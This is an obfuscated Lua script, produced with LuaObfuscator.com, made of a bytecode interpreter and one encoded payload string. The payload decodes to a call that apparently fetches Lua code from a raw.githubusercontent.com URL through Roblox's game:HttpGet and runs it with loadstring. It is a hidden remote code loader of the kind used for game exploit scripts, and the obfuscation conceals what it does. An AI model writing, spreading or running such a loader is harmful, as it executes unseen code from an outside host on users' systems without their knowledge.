--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v70=v2(v0(v30,16));if v19 then local v90=v5(v70,v19);v19=nil;return v90;else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=(v31/((1453 -(329 + 1122))^(v32-(1 -0))))%(2^(((v33-(1 + 0)) -(v32-(1 -0))) + (2 -(1287 -(631 + 655))))) ;return v71-(v71%(1 + 0)) ;else local v72=(307 -(287 + 18))^(v32-(2 -1)) ;return (((v31%(v72 + v72))>=v72) and (4 -3)) or (0 + 0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;return (v36 * (279 -(16 + 7))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (6 -4) + 2 ;return (v40 * (16779004 -(377 + 1411))) + (v39 * ((68693 -(355 + 806)) -((320 -111) + 1787))) + (v38 * 256) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1234 -(264 + 969) ;local v44=(v20(v42,1 -0 ,17 + 3 ) * ((4 -(5 -3))^(4 + 28))) + v41 ;local v45=v20(v42,7 + (49 -35) ,(1122 -(531 + 522)) -38 );local v46=((v20(v42,27 + 5 )==(1291 -(242 + (1767 -(642 + 77))))) and  -((1580 -(1332 + 247)) + 0)) or (1458 -(614 + 843)) ;if (v45==(0 -0)) then if (v44==(504 -(302 + 202))) then return v46 * (0 + 0) ;else local v91=0 + (806 -(68 + 738)) ;while true do if (v91==(0 -0)) then v45=1 + 0 ;v43=0 + 0 ;break;end end end elseif (v45==2047) then return ((v44==(0 + 0)) and (v46 * ((1 + 0)/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(2384 -1361) ) * (v43 + (v44/(((5 -2) -(923 -(839 + 83)))^((96 -62) + 18)))) ;end local function v25(v47)local v48=99 -(74 + 25) ;local v49;local v50;while true do if (v48==(13 -(21 -11))) then return v6(v50);end if (v48==(82 -(4 + 77))) then v49=v3(v16,v18,(v18 + v47) -(1 + (409 -(144 + 265))) );v18=v18 + v47 ;v48=2;end if (v48==((35 -26) -(16 -9))) then v50={};for v92=2 -1 , #v49 do v50[v92]=v2(v1(v3(v49,v92,v92)));end v48=2 + 1 ;end if (v48==(1797 -(207 + 1590))) then v49=nil;if  not v47 then v47=v23();if (v47==(1452 -(1101 + 351))) then return "";end end v48=1;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 -0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51==(2 + 0)) then v56=nil;v57=nil;v51=3;end if (v51~=1) then else local v83=23 -(19 + 4) ;while true do if (v83==0) then v54=nil;v55=nil;v83=3 -2 ;end if ((423 -(297 + 125))~=v83) then else v51=2;break;end end end if (v51==0) then local v84=0 -0 ;local v85;while true do if (v84==0) then v85=0;while true do if ((0 + 0)==v85) then v52=0 -0 ;v53=nil;v85=1461 -(1351 + 109) ;end if (v85==(1832 -(692 + 1139))) then v51=337 -(234 + 102) ;break;end end break;end end end if (v51==(9 -6)) then v58=nil;while true do local v94=0;local v95;while true do if (v94~=0) then else v95=0;while true do if (v95~=1) then else if (v52==(2 + 0)) then local v103=0;local v104;while true do if (v103~=0) then else v104=0;while true do if (v104==(1 + 0)) then local v122=0 -0 ;while true do if (v122~=(0 + 0)) then else local v133=0;while true do if (v133==0) then for v146=1,v23() do v55[v146]=v23();end return v56;end end end end end if (v104~=(0 -0)) then else local v123=0;while true do if (v123==(0 + 0)) then local v134=0 + 0 ;while true do if (v134~=1) then else v123=1;break;end if ((212 -(5 + 207))~=v134) then else for v148=1595 -(1551 + 43) ,v23() do local v149=0 + 0 ;local v150;local v151;local v152;while true do if (v149~=0) then else v150=0 + 0 ;v151=nil;v149=1;end if (v149~=1) then else v152=nil;while true do if (v150==1) then while true do if (v151==(0 + 0)) then v152=v21();if (v20(v152,1112 -(493 + 618) ,1)~=0) then else local v167=0;local v168;local v169;local v170;local v171;local v172;while true do if (v167~=(1 + 0)) then else v170=nil;v171=nil;v167=2;end if (v167==(0 + 0)) then v168=0;v169=nil;v167=2 -1 ;end if (v167==2) then v172=nil;while true do if (v168==(2 + 0)) then while true do if (v169~=(6 -3)) then else if (v20(v171,11 -8 ,8 -5 )~=1) then else v172[4]=v58[v172[4 + 0 ]];end v53[v148]=v172;break;end if (v169~=(66 -(12 + 54))) then else local v176=0;local v177;while true do if (v176==0) then v177=1948 -(547 + 1401) ;while true do if (v177~=0) then else local v186=0;while true do if (v186==1) then v177=147 -(50 + 96) ;break;end if (v186==(0 + 0)) then v170=v20(v152,2,8 -5 );v171=v20(v152,10 -6 ,27 -21 );v186=1 + 0 ;end end end if ((1 -0)~=v177) then else v169=1 + 0 ;break;end end break;end end end if (v169==2) then local v178=0;local v179;local v180;while true do if (v178~=(1 + 0)) then else while true do if (v179==0) then v180=0 -0 ;while true do if (v180==(1 + 0)) then v169=3;break;end if (v180~=(0 -0)) then else local v187=0;while true do if ((0 + 0)~=v187) then else if (v20(v171,3 -2 ,1)~=1) then else v172[1380 -(820 + 558) ]=v58[v172[2]];end if (v20(v171,2,2)~=(1 -0)) then else v172[3]=v58[v172[1710 -(1009 + 698) ]];end v187=1;end if (v187==(2 -1)) then v180=2 -1 ;break;end end end end break;end end break;end if (v178~=0) then else v179=0;v180=nil;v178=627 -(81 + 545) ;end end end if ((68 -(58 + 9))~=v169) then else local v181=0;local v182;local v183;while true do if (v181==(1 + 0)) then while true do if (v182==0) then v183=0;while true do if (v183~=1) then else v169=1938 -(1157 + 779) ;break;end if (v183==0) then local v188=293 -(135 + 158) ;local v189;while true do if (v188~=0) then else v189=0;while true do if (v189~=1) then else v183=1;break;end if (v189==0) then local v194=1276 -(1225 + 51) ;while true do if (v194==1) then v189=1;break;end if (v194~=0) then else v172={v22(),v22(),nil,nil};if (v170==(0 -0)) then local v195=0 + 0 ;while true do if (v195~=0) then else v172[3 + 0 ]=v22();v172[4]=v22();break;end end elseif (v170==(1203 -(308 + 894))) then v172[181 -(114 + 64) ]=v23();elseif (v170==(469 -(257 + 210))) then v172[2 + 1 ]=v23() -(2^(144 -(124 + 4))) ;elseif (v170~=3) then else local v200=1167 -(861 + 306) ;local v201;local v202;while true do if (v200~=(1 + 0)) then else while true do if (v201==0) then v202=0 + 0 ;while true do if (v202==(1812 -(1090 + 722))) then v172[11 -8 ]=v23() -(2^16) ;v172[2 + 2 ]=v22();break;end end break;end end break;end if ((0 -0)~=v200) then else v201=0;v202=nil;v200=1;end end end v194=320 -(6 + 313) ;end end end end break;end end end end break;end end break;end if ((0 -0)~=v181) then else v182=0 + 0 ;v183=nil;v181=1 + 0 ;end end end end break;end if (v168==1) then v171=nil;v172=nil;v168=2;end if (v168==(0 -0)) then local v173=0;local v174;while true do if ((1034 -(837 + 197))==v173) then v174=0 -0 ;while true do if ((1214 -(393 + 820))==v174) then v168=2 -1 ;break;end if (v174==(0 -0)) then v169=0 + 0 ;v170=nil;v174=1715 -(1240 + 474) ;end end break;end end end end break;end end end break;end end break;end if (v150~=(0 + 0)) then else local v163=703 -(41 + 662) ;while true do if (v163~=(1909 -(1718 + 190))) then else v150=1417 -(35 + 1381) ;break;end if (v163~=(0 + 0)) then else v151=0;v152=nil;v163=1 + 0 ;end end end end break;end end end for v153=1 + 0 ,v23() do v54[v153-(1 + 0) ]=v28();end v134=2 -1 ;end end end if (v123==1) then v104=1;break;end end end end break;end end end break;end if (v95==(0 + 0)) then local v102=0 -0 ;while true do if (v102==0) then local v105=0 -0 ;while true do if (v105==(1448 -(1266 + 182))) then if (1==v52) then local v124=0;while true do if (v124==(1 + 0)) then local v135=0;while true do if (v135==(1025 -(923 + 101))) then v124=2;break;end if ((0 -0)==v135) then local v143=0 + 0 ;while true do if ((0 + 0)~=v143) then else for v158=518 -(253 + 264) ,v57 do local v159=0 -0 ;local v160;local v161;local v162;while true do if (v159==(0 -0)) then local v164=1411 -(857 + 554) ;while true do if (v164~=(0 + 0)) then else v160=1876 -(961 + 915) ;v161=nil;v164=1;end if (v164~=(18 -(16 + 1))) then else v159=1;break;end end end if (v159~=1) then else v162=nil;while true do if (v160==(0 + 0)) then local v165=0;while true do if (v165==1) then v160=1;break;end if (v165==(0 + 0)) then v161=v21();v162=nil;v165=1;end end end if (v160~=1) then else if (v161==1) then v162=v21()~=0 ;elseif (v161==(1 + 1)) then v162=v24();elseif (v161==3) then v162=v25();end v58[v158]=v162;break;end end break;end end end v56[3]=v21();v143=1;end if (v143~=(1 + 0)) then else v135=1 + 0 ;break;end end end end end if (v124==2) then v52=1 + 1 ;break;end if (v124~=0) then else local v136=0 + 0 ;while true do if (v136~=1) then else v124=1;break;end if ((1903 -(551 + 1352))~=v136) then else v57=v23();v58={};v136=1;end end end end end if (0==v52) then local v125=0;local v126;while true do if (v125==(0 + 0)) then v126=1611 -(1596 + 15) ;while true do if (v126~=0) then else local v144=0 + 0 ;while true do if (v144==(1 + 0)) then v126=1;break;end if ((1558 -(1060 + 498))~=v144) then else v53={};v54={};v144=1779 -(1484 + 294) ;end end end if (v126==(2 + 0)) then v52=1;break;end if ((1 + 0)==v126) then v55={};v56={v53,v54,nil,v55};v126=2;end end break;end end end v105=1;end if (v105==1) then v102=1159 -(330 + 828) ;break;end end end if (v102~=(2 -1)) then else v95=1;break;end end end end break;end end end break;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v65=1;local v66= -1;local v67={...};local v68=v12("#",...) -1 ;local function v69()local v73=v62;local v74=v63;local v75=v64;local v76=v27;local v77={};local v78={};local v79={};for v86=0 -0 ,v68 do if (((3221 + 74)<(10737 -6789)) and (v86>=v75)) then v77[v86-v75 ]=v67[v86 + (1399 -(1274 + 124)) ];else v79[v86]=v67[v86 + (1282 -(922 + 108 + 251)) ];end end local v80=(v68-v75) + (544 -(101 + 442)) ;local v81;local v82;while true do local v87=144 -(11 + 133) ;local v88;while true do if ((v87==(0 -0)) or ((6027 -(1242 + (1792 -(1136 + 90))))<((13233 -8215) -(519 + (1263 -(83 + 360)))))) then v88=(8868 -6981) -(686 + 1201) ;while true do if (((527 + (1108 -(342 + 629)))<((17112 -8022) -5915)) and (v88==(1 -0))) then if ((v82<=(1370 -(366 + 1002))) or ((6427 -1608)<(975 + 1290))) then if ((v82<=(0 -0)) or ((5162 -(746 + 287))<((2407 -(272 + 1143)) + (11052 -8349)))) then v79[v81[4 -2 ]]();elseif (((1323 + (3290 -(168 + 42)))>=331) and (v82==(1800 -(1579 + 220)))) then local v106=1932 -(157 + 651 + 1124) ;local v107;local v108;while true do if ((v106==(816 -(597 + 218))) or ((5889 -2953)<=((4489 -3442) -(39 + 2)))) then v79[v107 + (1808 -(1034 + 773)) ]=v108;v79[v107]=v108[v81[3 + 1 ]];break;end if (((3548 -1822)<(1820 + 231)) and (v106==(1919 -(974 + 945)))) then v107=v81[3 -1 ];v108=v79[v81[966 -(632 + 331) ]];v106=1;end end else do return;end end elseif (((46 + 1278)<(2311 -965)) and (v82<=4)) then if ((v82==((17 -6) -8)) or (840>(352 + 3248))) then local v109=0 -0 ;local v110;local v111;while true do if ((v109==(205 -((1047 -(590 + 257)) + 5))) or ((478 + 1598)<(173 + 286))) then local v132=1355 -(252 + (1681 -(482 + 96))) ;while true do if (((2685 -447)>=409) and (v132==(1 -0))) then v109=4 -3 ;break;end if (((665 -(211 + 333))<(2464 -(1602 + 41))) and (v132==(0 + 0))) then v110=0 -0 ;v111=nil;v132=2 -1 ;end end end if ((v109==(1 + 0)) or ((3824 + 929)<=(5884 -3370))) then while true do if ((v110==(0 -0)) or ((5412 -(903 + (1232 -(167 + 21))))<116)) then v111=v81[1510 -(295 + 1213) ];v79[v111]=v79[v111](v13(v79,v111 + 1 + (0 -0) ,v66));break;end end break;end end else v79[v81[1717 -(1663 + (190 -138)) ]]=v81[6 -(2 + 1) ];end elseif (((98 + 2119)==(3776 -1559)) and (v82==(23 -18))) then v79[v81[1 + 1 ]]=v61[v81[3 + 0 ]];else local v116=1009 -(132 + 877) ;local v117;local v118;local v119;local v120;local v121;while true do if (((2535 + 1176)>=(2809 -975)) and ((2 + 0)==v116)) then v121=nil;while true do if (((11581 -7192)==((4741 + 3178) -3530)) and (v117==(1 + 1))) then for v141=v118,v66 do local v142=(3294 -1474) -(609 + 1211) ;while true do if (((1270 -(133 + 25))>=((1346 -(35 + 1108)) + 110)) and (v142==(0 -0))) then v121=v121 + 1 + 0 ;v79[v141]=v119[v121];break;end end end break;end if (((4270 -(2651 -1072))<3452) and (v117==(1154 -(513 + 641)))) then local v139=0 + 0 ;while true do if ((v139==(0 -0)) or ((180 + 506 + 622)<(1129 + 120))) then v118=v81[766 -(259 + 505) ];v119,v120=v76(v79[v118](v13(v79,v118 + (1950 -(464 + 1485)) ,v81[7 -(1639 -(11 + 1624)) ])));v139=2 -1 ;end if ((v139==(941 -(565 + (2078 -(569 + 1134))))) or ((2709 + 387)>((3587 -(93 + 1014)) + 2055))) then v117=1 -0 ;break;end end end if (((9500 -5622)>663) and (v117==(1511 -(1222 + 288)))) then local v140=0 -0 ;while true do if ((v140==(1755 -(442 + 1312))) or ((12292 -7359)<=(3687 -(615 + 554)))) then v117=96 -(53 + 41) ;break;end if ((v140==(0 + 0)) or ((8323 -4247)>((99 -58) + 4536))) then v66=(v120 + v118) -(1 -0) ;v121=(724 + 362) -(264 + 822) ;v140=3 -2 ;end end end end break;end if ((v116==0) or (((4670 -1402) -(77 + 883))<=(30 + 850))) then v117=708 -(24 + 684) ;v118=nil;v116=(4072 -2183) -(824 + 1064) ;end if ((v116==(1 -(0 -0))) or ((4384 -2280)<=(2355 -816))) then v119=nil;v120=nil;v116=(4 -2) -0 ;end end end v65=v65 + 1 + 0 ;break;end if ((v88==(0 + 0 + 0)) or ((1332 + 824)<(14 + 39))) then v81=v73[v65];v82=v81[1 + 0 ];v88=(1341 -(77 + 1041)) -(96 + 126) ;end end break;end end end end A,B=v27(v11(v69));if  not A[1] then local v89=v59[4][v65] or "?" ;error("Script error at ["   .. v89   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5368652O733O682F6D696C6B2F6D61696E2F742O6F6661737400083O0012053O00013O001205000100023O002001000100010003001204000300044O0006000100034O00035O00026O000100012O00023O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
